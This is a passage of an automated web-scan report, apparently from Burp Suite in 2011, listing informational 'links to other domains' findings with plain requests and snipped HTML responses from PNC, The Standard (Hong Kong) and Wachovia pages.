Set-Cookie: PNCSessionCookie=/pnccorp/PNC/Home/Personal; Expires=Thu, 02 Feb 2012 22:36:49 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 38312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</b> you are not a Wealth Management Client, but rather an Interested Party, and you must <a href="https://www.pncadvisors.com/thirdpartyindex.html" ><b>
...[SNIP]...
<div id="sectionBrand1">
           

                   <script src="https://content.pncmc.com/live/pnc/mastheads/flashMastheads/data/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
<div class="promoLink colorBold"><a href="https://www.pncsites.com/IRA/choosing.html?WT.mc_id=IRA10_PNCWeb_0001&WT.ac=IRA_0810_P_LN" name="/pnccorp/pnc/global/promotions/personal+promotions/p_adlink_iramicrosite">Get the guidance you need...</a>
...[SNIP]...
<span class="listCopySm"><a href="https://www.pncsites.com/IRA/choosing.html?WT.mc_id=IRA10_PNCWeb_0001&WT.ac=IRA_0810_P_LN" name="/pnccorp/pnc/global/promotions/personal+promotions/p_adlink_iramicrosite">more&nbsp;<img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&g
...[SNIP]...
<td class="navbar"><a href="https://www.pncsites.com/IRA/home.html" name="/pnccorp/pnc/home/personal/ira+retirement+center"><img border="0" src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" name="dot_img Lis
...[SNIP]...
<td class="navbar"><a href="https://www.pncsites.com/points/index.html" name="/pnccorp/pnc/home/personal/pnc+points"><img border="0" src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" name="dot_img Lis
...[SNIP]...
<td class="navbar"><a href="https://www.pncvirtualwallet.com" name="/pnccorp/pnc/home/personal/virtual+wallet"><img border="0" src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" name="dot_img Lis
...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
<noscript>
<iframe src="https://view.atdmt.com/iaction/deupnc_PersonalBankingHome_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.144. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:04 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 22:20:04 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=174
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 41285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</b> you are not a Wealth Management Client, but rather an Interested Party, and you must <a href="https://www.pncadvisors.com/thirdpartyindex.html" ><b>
...[SNIP]...
<div id="sectionBrand1">
           

                   <script src="https://content.pncmc.com/live/pnc/mastheads/flashMastheads/data/js/swfobject.js"></script>
...[SNIP]...
<td class="navbar"><a target="_blank" href="https://www.pncsites.com/CFO/index.html" name="/pnccorp/pnc/home/small+business/cfo"><img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&gt;" name="
...[SNIP]...
<td class="navbar"><a href="https://www.pncsites.com/points/index.html" name="/pnccorp/pnc/home/small+business/pnc+points"><img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&gt;" name="
...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/deupnc_SmallBusinessHome_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.145. https://www.pnc.com/webapp/unsec/NCProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/NCProductsAndService.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/NCProductsAndService.do?siteArea=/pnccorp/PNC/Home/About+PNC HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:06 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9OQ1Byb2R1Y3RzQW5kU2VydmljZS5kbw..
Keep-Alive: timeout=60, max=284
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 37311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
<div id="sectionBrand2">
           

                   <script src="https://content.pncmc.com/live/pnc/mastheads/flashMastheads/data/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
<td class="navbar"><a href="https://content.pncmc.com/live/pnc/careers/main/index.html" name="/pnccorp/pnc/home/about+pnc/pnc+careers/pnc+careers"><img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&gt;" name="
...[SNIP]...
<td class="areaIndex"><a href="https://content.pncmc.com/live/pnc/careers/main/index.html" name="/pnccorp/PNC/Home/About+PNC/PNC+Careers/Working+at+PNC"><img src="/webapp/unsec/Requester?resource=/wps/wcm/connect/0111bb804e5c7fc8a096a7fc6d630ad7/pnc_lst_arr_trans.gif?MOD=AJPERES&amp;CACHEID=0111bb804e5c7fc8a096a7fc6d630ad7" border="0" alt="&gt;" name="
...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...

16.146. https://www.pnc.com/webapp/unsec/ProductsAndService.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/ProductsAndService.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/ProductsAndService.do?siteArea=/pnccorp/PNC/Home/Personal/Online+Banking/PNC+Bank+Online+Banking/Online+Banking+and+Bill+Pay HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:08 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Qcm9kdWN0c0FuZFNlcnZpY2UuZG8.
Keep-Alive: timeout=60, max=296
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/deupnc_PersonalFinanceOnlineBankingBillPay_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.147. https://www.pnc.com/webapp/unsec/Solutions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pnc.com
Path:   /webapp/unsec/Solutions.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/unsec/Solutions.do?siteArea=/pnccorp/PNC/Customer+Service HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:05 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Tb2x1dGlvbnMuZG8.
Keep-Alive: timeout=60, max=293
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 18957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...
</a> | <a href="https://content.pncmc.com/live/pnc/careers/main/index.html" >Careers</a>
...[SNIP]...
</a><a href="https://www.pncvirtualwallet.com/" >Virtual Wallet</a>
...[SNIP]...
<noscript>
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcsx2yobi00000w45we0xdcvj_6x2g/njs.gif?dcsuri=/nojavascript&amp;WT.js=No">
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="https://kod-rl95-prod.responseondemand.com/tracker/vtc.php?orgid=1263883&ichannelid=MYrCvG1282701"></script>
...[SNIP]...
<noscript><iframe src="https://view.atdmt.com/iaction/deupnc_CustomerService_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

16.148. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news_detail.asp?we_cat=4&art_id=107529&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 59076
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=KECBPJKADJGPCICDBADCHBPA; path=/
Cache-control: private


<html>

<HTML>


<HEAD>

<title>Aqua City deaths make splash - The Standard</title>
<meta NAME="keywords" CONTENT="Aqua,City,deaths,make,splash,The Standard">
<meta NAME="description" CON
...[SNIP]...
<area shape="rect" coords="325,1,400,15" href="http://student.thestandard.com.hk/" target="_blank">
           <area shape="rect" coords="404,1,479,15" href="http://www.singtao.com/" target="_blank">
           <area shape="rect" coords="482,1,557,15" href="http://www.thestandard.com.hk/careers.asp">
...[SNIP]...
</script-->
<script language="Javascript" src="http://www.hkheadline.com/js/headline_top_date_weather.js?d=20112391733"></script>
...[SNIP]...
<TD align="middle"><a href="http://www.puremedia-asia.com/" target=_blank><img src="/banners_revamp/puremedia-logo-mini.jpg" border="0">
...[SNIP]...
<noscript><a href='http://203.80.0.221/www/delivery/ck.php?n=a2005f29&amp;cb=%n' target='_blank'><img src='http://203.80.0.221/www/delivery/avw.php?zoneid=4&amp;n=a2005f29&amp;ct0=%c' border='0' alt='' /></a>
...[SNIP]...
</script>
                                   <script type="text/javascript"
                                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                   </script>
...[SNIP]...
<TD width="120" align="middle">    
               <a href="http://itunes.apple.com/us/app/thestandard/id408301869" target="blank">
               <IMG src="/images/MT12024_iPhone-icon-for-website.gif" width="120" border="0">
...[SNIP]...
<noscript><a href='http://203.80.0.221/www/delivery/ck.php?n=a155483d&amp;cb=%n' target='_blank'><img src='http://203.80.0.221/www/delivery/avw.php?zoneid=10&amp;n=a155483d&amp;ct0=%c' border='0' alt='' /></a>
...[SNIP]...
<noscript>
   <img src="//secure-sg.imrworldwide.com/cgi-bin/m?ci=hk-TheStandard&amp;cg=0" alt="">
</noscript>
<!-- END Nielsen//NetRatings SiteCensus V5.1 -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.singtaonewscorp.com/" target="_blank"><img src="/images/footer_logo/singtaocorp.gif" border="0">
...[SNIP]...
<td><a href="http://www.hkheadline.com/" target="_blank"><img src="/images/footer_logo/headline.gif" border="0">
...[SNIP]...
<td><a href="http://www.singtao.com/" target="_blank"><img src="/images/footer_logo/singtao_com.gif" border="0">
...[SNIP]...
<td ><a href="http://www.pcmarket.com.hk/" target="_blank"><img src="/images/footer_logo/pcm.gif" border="0">
...[SNIP]...
<td><a href="http://www.cazbuyer.com/" target="_blank"><img src="/images/footer_logo/cazbuyer.gif" border="0">
...[SNIP]...
<td><a href="http://www.easttouch.com.hk/" target="_blank"><img src="/images/footer_logo/eastouch.gif" border="0">
...[SNIP]...
<td><a href="http://www.eastweek.com.hk/" target="_blank"><img src="/images/footer_logo/dongtouch.gif" border="0">
...[SNIP]...
<td><a href="http://www.singtaobooks.com/" target="_blank"><img src="/images/footer_logo/singtao_pub.gif" border="0">
...[SNIP]...

16.149. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news_detail.asp?we_cat=4&art_id=107529&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:56:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 59076
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=DHADPJKABEKJMENGIGAPIBKB; path=/
Cache-control: private


<html>

<HTML>


<HEAD>

<title>Aqua City deaths make splash - The Standard</title>
<meta NAME="keywords" CONTENT="Aqua,City,deaths,make,splash,The Standard">
<meta NAME="description" CON
...[SNIP]...
<area shape="rect" coords="325,1,400,15" href="http://student.thestandard.com.hk/" target="_blank">
           <area shape="rect" coords="404,1,479,15" href="http://www.singtao.com/" target="_blank">
           <area shape="rect" coords="482,1,557,15" href="http://www.thestandard.com.hk/careers.asp">
...[SNIP]...
</script-->
<script language="Javascript" src="http://www.hkheadline.com/js/headline_top_date_weather.js?d=20112395657"></script>
...[SNIP]...
<TD align="middle"><a href="http://www.puremedia-asia.com/" target=_blank><img src="/banners_revamp/puremedia-logo-mini.jpg" border="0">
...[SNIP]...
<noscript><a href='http://203.80.0.221/www/delivery/ck.php?n=a2005f29&amp;cb=%n' target='_blank'><img src='http://203.80.0.221/www/delivery/avw.php?zoneid=4&amp;n=a2005f29&amp;ct0=%c' border='0' alt='' /></a>
...[SNIP]...
</script>
                                   <script type="text/javascript"
                                   src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                                   </script>
...[SNIP]...
<TD width="120" align="middle">    
               <a href="http://itunes.apple.com/us/app/thestandard/id408301869" target="blank">
               <IMG src="/images/MT12024_iPhone-icon-for-website.gif" width="120" border="0">
...[SNIP]...
<noscript><a href='http://203.80.0.221/www/delivery/ck.php?n=a155483d&amp;cb=%n' target='_blank'><img src='http://203.80.0.221/www/delivery/avw.php?zoneid=10&amp;n=a155483d&amp;ct0=%c' border='0' alt='' /></a>
...[SNIP]...
<noscript>
   <img src="//secure-sg.imrworldwide.com/cgi-bin/m?ci=hk-TheStandard&amp;cg=0" alt="">
</noscript>
<!-- END Nielsen//NetRatings SiteCensus V5.1 -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<td><a href="http://www.singtaonewscorp.com/" target="_blank"><img src="/images/footer_logo/singtaocorp.gif" border="0">
...[SNIP]...
<td><a href="http://www.hkheadline.com/" target="_blank"><img src="/images/footer_logo/headline.gif" border="0">
...[SNIP]...
<td><a href="http://www.singtao.com/" target="_blank"><img src="/images/footer_logo/singtao_com.gif" border="0">
...[SNIP]...
<td ><a href="http://www.pcmarket.com.hk/" target="_blank"><img src="/images/footer_logo/pcm.gif" border="0">
...[SNIP]...
<td><a href="http://www.cazbuyer.com/" target="_blank"><img src="/images/footer_logo/cazbuyer.gif" border="0">
...[SNIP]...
<td><a href="http://www.easttouch.com.hk/" target="_blank"><img src="/images/footer_logo/eastouch.gif" border="0">
...[SNIP]...
<td><a href="http://www.eastweek.com.hk/" target="_blank"><img src="/images/footer_logo/dongtouch.gif" border="0">
...[SNIP]...
<td><a href="http://www.singtaobooks.com/" target="_blank"><img src="/images/footer_logo/singtao_pub.gif" border="0">
...[SNIP]...

16.150. https://www.wachovia.com/enroll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /enroll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /enroll?intcid=HP_DL_OLS_OBP_FreeSecure_810 HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:56 GMT
Server: IBM_HTTP_Server
Content-Length: 10499
Set-Cookie: JSESSIONID=0000d_UcWjeBQz1n1iUIxauhern:13k56putc; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=174
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!--nove-->
<img src="https://secure.ace-tag.advertising.com/action/type=911946593/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=waconline_cs=2" width="1" height="1" border="0" />

<img src="https://ad.yieldmanager.com/pixel?id=534492&amp;t=2" width="1" height="1" border="0" />    
                       
                       
                                                                           <div id="tools">
...[SNIP]...

16.151. https://www.wachovia.com/foundation/v/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /foundation/v/index.jsp?vgnextoid=dfa83811630aa110VgnVCM1000004b0d1872RCRD HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:53 GMT
Server: IBM_HTTP_Server
Content-Length: 17144
Set-Cookie: wcp_hawk_accepted=true; Path=/; Secure
Set-Cookie: JSESSIONID=0000YYqzf3u-opD_d-KDjtAiehO:12odtgdjf; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=28
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<noscript>
                       <a href="https://adfarm.mediaplex.com/ad/ck/13270-84440-3408-3"><img alt="Promo: Now may be a great time to refinance. Click to find out more." src="/common_images/19685_noWF_Segment_540x134_v1a.jpg" title="Promo: Now may be a great time to refinance. Click to find
...[SNIP]...
<li><a href="https://www.wellsfargo.com/wachovia/mortgage/index?dm=DMIWEWAC02">Mortgage</a>
...[SNIP]...
<noscript>
                       <a href="https://adfarm.mediaplex.com/ad/ck/13270-86568-3408-25"><img alt="Promo: FREE ONLINE BILLPAY. The Easy, Secure Way to Pay Your Bills in One Location. Find Out More." height="135" src="https://www.wachovia.com/common_images/20511_180x135_01T.jpg" title="Prom
...[SNIP]...
</div><img border="0" height="225" id="widgetgrp" name="widgetgrp" src="https://www.mworld.com/asp/mw.asp?lp=GetGIF&amp;Image=wb2dw.gif" usemap="#mgmap" width="186" /> <map name="mgmap">
...[SNIP]...

16.152. https://www.wachovia.com/foundation/v/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wachovia.com
Path:   /foundation/v/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /foundation/v/index.jsp?vgnextoid=4d81d9d35a95b210VgnVCM200000627d6fa2RCRD&appInstanceName=default&vgnextnoice=1 HTTP/1.1
Host: www.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_visit%3D1%7C1296685910831%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271296684110831%2527%255D%255D%7C1454450510831%3B%20s_nr%3D1296684110831-New%7C1328220110831%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_servemethod%3DPage%2520Default%3B; originalReferrer=; TLTSID=CB01F7F42F17102FA757AB53C440707C;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:28:54 GMT
Server: IBM_HTTP_Server
Content-Length: 10960
Set-Cookie: wcp_hawk_accepted=true; Path=/; Secure
Set-Cookie: JSESSIONID=0000x1r_H5nejWS-Tu-rkvnAeuc:13k56putc; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=169
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
...[SNIP]...
<li><a href="https://retirementstrategy.mworld.com/retirement/cashdistribution/calculator.asp">Calculate the cost</a>
...[SNIP]...
<p><a href="https://www.wellsfargo.com/locator/wellsfargoadvisors/" onclick="window.open('https://www.wellsfargo.com/locator/wellsfargoadvisors/','','location=yes,scrollbars=yes,menubar=yes,resizable=yes,toolbar=yes,status=yes,width=1015,height=550');return false;">Find a Financial Advisor</a>
...[SNIP]...

